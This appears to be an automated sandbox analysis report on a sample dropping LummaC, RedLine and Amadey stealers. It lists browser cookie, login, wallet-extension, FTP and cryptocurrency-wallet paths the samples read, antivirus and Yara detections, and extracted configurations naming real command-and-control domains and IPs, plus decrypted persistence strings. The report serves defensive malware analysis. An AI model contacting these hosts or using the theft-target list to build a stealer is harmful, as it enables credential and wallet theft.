Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior

Source: Yara match	File source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loqVSeJ.exe PID: 2848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7fOMOTQ.exe PID: 972, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 7fOMOTQ.exe PID: 972, type: MEMORYSTR
Source: Yara match	File source: 11.2.7fOMOTQ.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loqVSeJ.exe PID: 2848, type: MEMORYSTR

Source: Yara match	File source: 14.2.5bzo1pz.exe.5ce0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.5bzo1pz.exe.be6acc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.5bzo1pz.exe.b463d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.5bzo1pz.exe.bc09d4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.5bzo1pz.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4568824649.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.4542302807.0000000000B46000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5bzo1pz.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\5bzo1pz[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	11 Peripheral Device Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	12 Process Injection	3 Obfuscated Files or Information	LSASS Memory	11 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Scheduled Task/Job	22 Software Packing	Security Account Manager	325 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	1 Timestomp	NTDS	1071 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	571 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	571 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: https://rebeldettern.com/Micr	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/Soft2	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/a(X	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apiu8	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/s	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com:443/api	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/y(	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/iNia	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/60Br	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apip	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/C	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/L	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/1)	Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/Y	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loqVSeJ[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["rebeldettern.com", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "siVePy--"}
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 9.2.loqVSeJ.exe.370000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\5bzo1pz[1].exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loqVSeJ[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\tmp2A3C.tmp	ReversingLabs: Detection: 52%

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loqVSeJ[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	Joe Sandbox ML: detected

Source: Ryay9q4aDy.exe	Virustotal: Detection: 48%			Perma Link
Source: Ryay9q4aDy.exe	ReversingLabs: Detection: 52%

Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: rebeldettern.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: importenptoc.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: voicesharped.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: inputrreparnt.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: torpdidebar.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: actiothreaz.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: garulouscuto.com
Source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	String decryptor: breedertremnd.com
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 185.215.113.43
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: S-%lu-
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abc3bc1985
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: skotes.exe
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Startup
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rundll32
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Programs
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: %USERPROFILE%
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cred.dll
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clip.dll
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: http://
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: https://
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /quiet
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /Plugins/
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: &unit=
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shell32.dll
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: kernel32.dll
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ProgramData\
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: AVAST Software
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Kaspersky Lab
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Panda Security
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Doctor Web
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 360TotalSecurity
